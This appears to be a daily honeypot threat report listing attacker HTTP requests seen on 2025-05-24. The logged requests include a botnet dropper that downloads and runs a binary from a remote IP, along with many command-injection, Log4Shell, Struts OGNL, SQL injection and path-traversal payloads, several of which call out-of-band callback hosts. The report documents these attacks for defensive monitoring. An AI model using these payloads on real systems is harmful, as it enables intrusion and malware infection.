Daily Report: 2025-05-24#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 12 stage 1 IP address(es), linked to 12 dropper URL(s).
There are 577 new requests that have never been observed before (these were added to the monitored request database.).
A total of 6906 requests were recorded during the day, originating from 12 different countries, with a peak of 5234 requests coming from AE.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
DE | Dubai |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
176.65.148.236 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.1 |
89.39.121.48 | mac=1&ip=127.0.0.1 |
89.39.121.48 | GET /backupmgt/localJob.php?session=fail;wget+http://d0or1j3jkkn1q8dabd70jhwg7nzcfojt6.oast.online; HTTP/1.1 |
89.39.121.48 | GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d0or1j3jkkn1q8dabd70oheoeuskhy1pa.oast.online; HTTP/1.1 |
89.39.121.48 | GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d0or1j3jkkn1q8dabd70jxrgmupuys6nd.oast.online%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1 |
89.39.121.48 | GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://d0or1j3jkkn1q8dabd70ef9fry4phapcx.oast.online) HTTP/1.1 |
89.39.121.48 | GET /search.php?search=%22;wget+http%3A%2F%2Fd0or1j3jkkn1q8dabd70suwr8etnbsh8q.oast.online%27;%22 HTTP/1.1 |
89.39.121.48 | GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://d0or1j3jkkn1q8dabd701e1xsjch8zn9c.oast.online)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 |
89.39.121.48 | GET /?action=command&command=set_city_timezone&value=$(wget%20http://d0or1j3jkkn1q8dabd70zz6q47jf9uooc.oast.online)) HTTP/1.1 |
89.39.121.48 | GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d0or1j3jkkn1q8dabd70eokghyjgooy67.oast.online;%27 HTTP/1.1 |
89.39.121.48 | GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d0or1j3jkkn1q8dabd70ij66yb789fxxg.oast.online; HTTP/1.1 |
89.39.121.48 | GET /page?id=2xXag0C3Z4AuXaHW97dbsU5U7Mi&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d0or1j3jkkn1q8dabd70owjxj3inahyob.oast.online%27);s HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
11 | 20 | POST /admin/ajax.php?action=login HTTP/1.1 |
27 | 16 | POST /contactus.php HTTP/1.1 |
35 | 12 | POST /login.html HTTP/1.1 |
39 | 12 | POST /module/ HTTP/1.1 |
42 | 12 | GET /api/blade-user/user-list HTTP/1.1 |
48 | 12 | POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 |
55 | 8 | POST /c/router HTTP/1.1 |
59 | 8 | GET /2xXafNONYWEwvWczbdmQV8uhXdK.txt HTTP/1.1 |
70 | 8 | POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1 |
75 | 8 | GET /global-protect/portal/images/2xXafgPyvvB8n6lGGj0cSgnZ4J0.txt HTTP/1.1 |
79 | 8 | POST /partymgr/control/getJSONuiLabelArray HTTP/1.1 |
83 | 8 | POST /partymgr/control/getJSONuiLabel HTTP/1.1 |
84 | 8 | GET /b_download/index.html HTTP/1.1 |
89 | 8 | POST /tools.cgi HTTP/1.1 |
91 | 8 | POST /search/ HTTP/1.1 |
100 | 8 | POST /controller/login.php?acao=autenticar HTTP/1.1 |
107 | 8 | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 |
115 | 8 | POST /rpc.cgi HTTP/1.1 |
116 | 8 | POST /session_login.cgi HTTP/1.1 |
149 | 4 | GET /wp-content/uploads/workreap-temp/2xXafaccbPYMHJq5oC9dzxacu5a.php HTTP/1.1 |
152 | 4 | GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1 |
153 | 4 | GET /wp-content/uploads/kaswara/fonts_icon/lkrjzm/nj.php HTTP/1.1 |
156 | 4 | GET /wp-content/plugins/imagements/images/2xxafponmwdlrgkhn2eycryyltz.php HTTP/1.1 |
158 | 4 | GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\x22 HTTP/1.1 |
163 | 4 | POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1 |
164 | 4 | POST /lucee/2xXagOVWiNamToIYL0b8aFw7ucZ.cfm HTTP/1.1 |
176 | 4 | POST /wp-content/plugins/wpcargo/includes/2xXagBOxM9AKQVsJ0Ic5Kdw0UcG.php?1=var_dump HTTP/1.1 |
179 | 4 | POST /druid/indexer/v1/sampler HTTP/1.1 |
181 | 4 | GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2xXagBOxM9AKQVsJ0Ic5Kdw0UcG.php HTTP/1.1 |
182 | 4 | GET /wp-content/plugins/wpcargo/includes/2xXagBOxM9AKQVsJ0Ic5Kdw0UcG.php HTTP/1.1 |
185 | 4 | GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1 |
190 | 4 | POST /AurallRECMonitor/services/svc-login.php HTTP/1.1 |
191 | 4 | POST /magmi/web/magmi_run.php HTTP/1.1 |
192 | 4 | GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d0or1j3jkkn1q8dabd70hsko9x4jx6c9e.oast.online%23 HTTP/1.1 |
193 | 4 | POST /magmi/web/magmi_saveprofile.php HTTP/1.1 |
196 | 4 | POST /meaweb/os/mxperson HTTP/1.1 |
198 | 4 | POST /os/mxperson HTTP/1.1 |
210 | 4 | GET /assets/data/usrimg/2xxagymweeng5btdlkakkpyovyv.php HTTP/1.1 |
212 | 4 | GET /file/UeuLE8.txt HTTP/1.1 |
213 | 4 | GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0or1j3jkkn1q8dabd70y7w7baw9qbod6.oast.online+-H+‘User-Agent%3a+NhXnxT’%60 HTTP/1.1 |
215 | 4 | GET /include/makecvs.php?Event=%60curl+http%3a//d0or1j3jkkn1q8dabd70ofk7yh3n4womj.oast.online+-H+‘User-Agent%3a+NhXnxT’%60 HTTP/1.1 |
216 | 4 | GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1 |
218 | 4 | GET /public/css/2xXafQwx5gEOnOjUKMZxmWHU0ZN.css HTTP/1.1 |
220 | 4 | GET /upload/userfiles/image/2xXagW3hr85pzoFFNiD2zFnrvAD.png HTTP/1.1 |
222 | 4 | POST /lucee/admin/imgProcess.cfm?file=/../../../context/2xXagOVWiNamToIYL0b8aFw7ucZ.cfm HTTP/1.1 |
223 | 4 | POST /casa/nodes/thumbprints HTTP/1.1 |
225 | 4 | POST /wp-json/buddypress/v1/signup HTTP/1.1 |
226 | 4 | GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1 |
228 | 4 | POST /_adminer.php HTTP/1.1 |
229 | 4 | POST /adminer/index.php HTTP/1.1 |
230 | 4 | POST /adminer.php HTTP/1.1 |
231 | 4 | POST /_adminer/index.php HTTP/1.1 |
232 | 4 | POST /adminer/adminer.php HTTP/1.1 |
233 | 4 | POST /minio/webrpc HTTP/1.1 |
239 | 4 | GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd70acwzspmtsc9ki.oast.online+-H+%27User-Agent:+YixVhj%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd70i85xdhkae4jb3.oast.online+-H+%27User-Agent:+YixVhj%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 |
240 | 4 | GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd705ry4ioatwkha4.oast.online+-H+%27User-Agent:+YixVhj%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0or1j3jkkn1q8dabd70otghcebigssgr.oast.online+-H+%27User-Agent:+YixVhj%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 |
244 | 4 | GET /graph_realtime.php?action=init HTTP/1.1 |
249 | 4 | GET /magmi/web/info.php HTTP/1.1 |
251 | 4 | POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 |
252 | 4 | GET /proxy?url=http%3a//0:8080/ HTTP/1.1 |
265 | 4 | GET /cgi-bin/2FtrEb.txt HTTP/1.1 |
267 | 4 | GET /archive/download?file=file:///etc/passwd HTTP/1.1 |
270 | 4 | POST /apply.cgi HTTP/1.1 |
271 | 4 | GET /index.php?p=member&destination HTTP/1.1 |
274 | 4 | GET /language/lang HTTP/1.1 |
275 | 4 | GET /?x=${jndi:ldap://${:-139}${:-211}.${hostName}.uri.d0or1j3jkkn1q8dabd70kfpkufjua3pxo.oast.online/a} HTTP/1.1 |
278 | 4 | GET /archive/download?file=http://d0or1j3jkkn1q8dabd70jojdnss3rfn6o.oast.online/ HTTP/1.1 |
279 | 4 | GET /vcac/?original_uri=http://xxx.xxx.xxx.xxx%2Fvcac HTTP/1.1 |
280 | 4 | GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1 |
283 | 4 | POST /modules/appagebuilder/apajax.php?rand=7077579477194 HTTP/1.1 |
286 | 4 | GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1 |
287 | 4 | POST /ca/rest/certrequests HTTP/1.1 |
294 | 4 | GET /backend/backend/auth/signin HTTP/1.1 |
296 | 4 | GET /?class.module.classLoader.resources.context.configFile=http://d0or1j3jkkn1q8dabd70cxepi79hx51i6.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1 |
297 | 4 | GET /?class.module.classLoader.resources.context.configFile=https://d0or1j3jkkn1q8dabd70pxu4r88bzdfzo.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1 |
299 | 4 | GET /wp-content/uploads/html2wp/2xXah3pbGFXV0s75rdiT35drttN.php HTTP/1.1 |
300 | 4 | GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL– HTTP/1.1 |
302 | 4 | GET /service/0/test.oast.me HTTP/1.1 |
303 | 4 | GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1 |
304 | 4 | POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1 |
306 | 4 | POST /actuator/gateway/routes/2xXafNucfd13haaplSKKoL5PQgV HTTP/1.1 |
315 | 4 | POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1 |
319 | 4 | GET /status.htm HTTP/1.1 |
330 | 4 | POST /api/snapshots HTTP/1.1 |
333 | 4 | GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1 |
334 | 4 | GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2xXagcDP8dfL2zOrStmofO1ZxBq.php&target=l1_Lw HTTP/1.1 |
336 | 4 | GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2xXafMCUy2JQenrvekCh6MtpCm8.php:aaa HTTP/1.1 |
344 | 4 | POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 |
346 | 4 | POST /action.php HTTP/1.1 |
347 | 4 | POST /delete_cart_goods.php HTTP/1.1 |
348 | 4 | POST /home/download HTTP/1.1 |
349 | 4 | POST /viewlog.jsp HTTP/1.1 |
351 | 4 | GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 |
353 | 4 | GET /about/../tree?action=get HTTP/1.1 |
355 | 4 | POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 |
356 | 4 | POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1 |
357 | 4 | GET /module/ph_simpleblog/list?sb_category=’)%20AND%20false–%20- HTTP/1.1 |
359 | 4 | GET /2xXafUVAjct11UjyJuydUBwJ5xw.php?cmd=sudo+rpm+–eval+’%25{lua%3aos.execute(\x22curl+http%3a//d0or1j3jkkn1q8dabd70q6w1r7mfmww8x.oast.online+-H+‘User-Agent%3a+fRC6hC’\x22)}’ HTTP/1.1 |
360 | 4 | GET /module/ph_simpleblog/list?sb_category=’)%20OR%20true–%20- HTTP/1.1 |
362 | 4 | GET /v1/2xXagkOcvPZmfxbsRyTBGLjD7aC.php HTTP/1.1 |
364 | 4 | GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 |
366 | 4 | POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1 |
367 | 4 | GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+mF9lZ8CcYH.log HTTP/1.1 |
368 | 4 | GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 |
369 | 4 | GET /public/index.php/home/file/user_pics HTTP/1.1 |
370 | 4 | POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1 |
371 | 4 | GET /wp-content/uploads/p3d/2xXaggbLKQNXtc2pRvafmpl8YaN.php HTTP/1.1 |
376 | 4 | GET /seeyon/test123456.jsp?pwd=asasd3344&2xXagFMHEdZv1orHtKkiOTiRdXr=ipconfig HTTP/1.1 |
379 | 4 | GET /fileserver/2xXagyJ5gasVQd9JvjilKU9CR5j.txt HTTP/1.1 |
380 | 4 | GET /debugging_center_utils_.php?log=;echo%20timzvurlbmrbdmlyrxtgxlgborwikxqo%20 |
381 | 4 | GET /__ HTTP/1.1 |
383 | 4 | POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 |
385 | 4 | GET /maint/modules/home/index.php?lang=english |
386 | 4 | GET /webadmin/script?command= |
388 | 4 | POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1 |
389 | 4 | POST /_search HTTP/1.1 |
393 | 4 | GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1 |
394 | 4 | POST /cgibin/webproc HTTP/1.1 |
398 | 4 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27– HTTP/1.1 |
399 | 4 | GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1 |
401 | 4 | POST /scripts/setup.php HTTP/1.1 |
403 | 4 | POST /website/blog/ HTTP/1.1 |
417 | 4 | GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 |
418 | 4 | POST /jolokia/read/getDiagnosticOptions HTTP/1.1 |
419 | 4 | POST /api/external/7.0/system.System.get_infos HTTP/1.1 |
421 | 4 | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 |
422 | 4 | GET /admin/compass?download=L2V0Yy9wYXNzd2Q= HTTP/1.1 |
424 | 4 | GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272xxaf7lqlyy3ro7uxuekisfucol%27%2C+NULL%2C+%27FB01AB16CA522DD86565870D7686FEC1%27%2C+%272xxaf7lqlyy3ro7uxuekisfucolFirstName%27%2C+%272xxaf7lqlyy3ro7uxuekisfucolLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272xxaf7lqlyy3ro7uxuekisfucol%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B–+- HTTP/1.1 |
425 | 4 | GET //juis_boxinfo.xml HTTP/1.1 |
427 | 4 | POST /clients/editclient.php?id=2xXafQ4dtlpbY4Hobx7lLeK7zhd&action=update HTTP/1.1 |
429 | 4 | POST /RPC2 HTTP/1.1 |
430 | 4 | GET /Synchronization HTTP/1.1 |
432 | 4 | GET /MptWR0.txt?true HTTP/1.1 |
437 | 4 | GET /RST_status.htm?x=1.gif HTTP/1.1 |
439 | 4 | GET /RST_status.htm HTTP/1.1 |
448 | 4 | POST /XMLCHART HTTP/1.1 |
450 | 4 | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2xXagQ9NkcwWQoR2r6lOziVhE7q.jsp HTTP/1.1 |
456 | 4 | GET /2xXag5Aum3Ax283t9kbD3DVqF8V.jsp HTTP/1.1 |
458 | 4 | POST /nagiosql/admin/menuaccess.php HTTP/1.1 |
459 | 4 | POST /nagiosql/admin/logbook.php HTTP/1.1 |
463 | 4 | GET /logos_clients/2xXafQ4dtlpbY4Hobx7lLeK7zhd.php HTTP/1.1 |
465 | 4 | POST /orders/3 HTTP/1.1 |
467 | 4 | POST /struts2-rest-showcase/orders/3 HTTP/1.1 |
468 | 4 | GET /2xXag75fS7X4bAqdh3issFEdlAK.php%5Cx0A HTTP/1.1 |
469 | 4 | GET /debugging_center_utils_.php?log=;echo%20timzvurlbmrbdmlyrxtgxlgborwikxqo%20 |
471 | 4 | GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2xXah5UTHfjNTt843ANv5tur5sd.txt HTTP/1.1 |
472 | 4 | POST /service/rest/beta/repositories/bower/group HTTP/1.1 |
474 | 4 | POST /v2/api/product/manger/getInfo HTTP/1.1 |
475 | 4 | POST /service/rapture/session HTTP/1.1 |
476 | 4 | POST /content/2xXagHsfRJjXi0bc4pjwG7CrBvd.af.internalsubmit.json HTTP/1.1 |
479 | 4 | POST /content/2xXagHsfRJjXi0bc4pjwG7CrBvd HTTP/1.1 |
480 | 4 | GET /objects/hrfql.txt HTTP/1.1 |
484 | 4 | POST /CDGServer3/ClientAjax HTTP/1.1 |
485 | 4 | GET /prfidmtNcn.txt HTTP/1.1 |
486 | 4 | GET /objects/getImageMP4.php?base64Url=YGlkID4gaHJmcWwudHh0YA===&format=jpg HTTP/1.1 |
487 | 4 | GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20prfidmtNcn.txt%60 HTTP/1.1 |
488 | 4 | GET /objects/getImage.php?base64Url=YGlkID4gaHJmcWwudHh0YA===&format=png HTTP/1.1 |
490 | 4 | POST /cgi-bin/supportInstaller HTTP/1.1 |
496 | 4 | POST /node/1?_format=hal_json HTTP/1.1 |
497 | 4 | GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gaHJmcWwudHh0YA===&format=jpg HTTP/1.1 |
499 | 4 | GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 |
503 | 4 | GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1 |
504 | 4 | GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 |
505 | 4 | POST /jars/upload HTTP/1.1 |
506 | 4 | GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 |
507 | 4 | POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 |
508 | 4 | POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 |
509 | 4 | POST /modules/appagebuilder/apajax.php?rand=8523591246111 HTTP/1.1 |
510 | 4 | GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e6859595763334f45464b5a474a465a46646d56545a47656d394e515464476145705822207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1 |
513 | 4 | GET /include/vytk.txt HTTP/1.1 |
514 | 4 | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Evytk.txt HTTP/1.1 |
516 | 4 | POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 |
519 | 4 | POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 |
520 | 4 | GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 |
521 | 4 | POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1 |
523 | 4 | GET /api/experimental/test HTTP/1.1 |
527 | 4 | POST /webtools/control/xmlrpc HTTP/1.1 |
529 | 4 | GET /Uploads/2xXafmbvsuW5hdLz6RBuzWMy97Z.php7 HTTP/1.1 |
531 | 4 | GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 |
535 | 4 | POST /index.php/User/doLogin HTTP/1.1 |
536 | 4 | POST /mobile/plugin/browser.jsp HTTP/1.1 |
538 | 4 | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 |
539 | 4 | GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1 |
540 | 4 | POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 |
541 | 4 | POST /?q=node&destination=node HTTP/1.1 |
543 | 4 | GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1 |
546 | 4 | POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 |
547 | 4 | POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp&nonce HTTP/1.1 |
552 | 4 | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1 |
553 | 4 | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 |
555 | 4 | POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 |
556 | 4 | POST /pandora_console/index.php?login=1 HTTP/1.1 |
558 | 4 | GET /xmlpserver/convert?xml=<%3fxml+version%3d\x221.0\x22+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 |
559 | 4 | POST /dashboard/uploadID.php HTTP/1.1 |
560 | 4 | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 |
562 | 4 | GET /talari/app/files/2xXafNaA0YEzYpMBr8EnNAlHkaD HTTP/1.1 |
564 | 4 | GET /?echo+XLutucaNAy HTTP/1.1 |
565 | 4 | POST /boafrm/formSysCmd HTTP/1.1 |
567 | 4 | GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 |
571 | 4 | POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1 |
579 | 4 | GET /wp-content/plugins/LayerSlider/assets/static/public/front.css HTTP/1.1 |
583 | 4 | GET /?InternalDir=\x5C..\x5C..\x5C..\x5C..\x5Cetc&InternalFile=passwd HTTP/1.1 |
585 | 4 | GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 |
